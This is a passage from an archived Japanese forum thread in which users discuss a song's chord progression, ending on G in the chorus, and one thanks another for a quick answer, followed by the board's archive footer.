【サビ】の2回目は最後そのまま( | G | )

ややこしくなってスマソ

345 :伝説の名無しさん:2007/01/28(日) 18:40:54
>>343
これは、これは早速ありがとうございます。

62 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)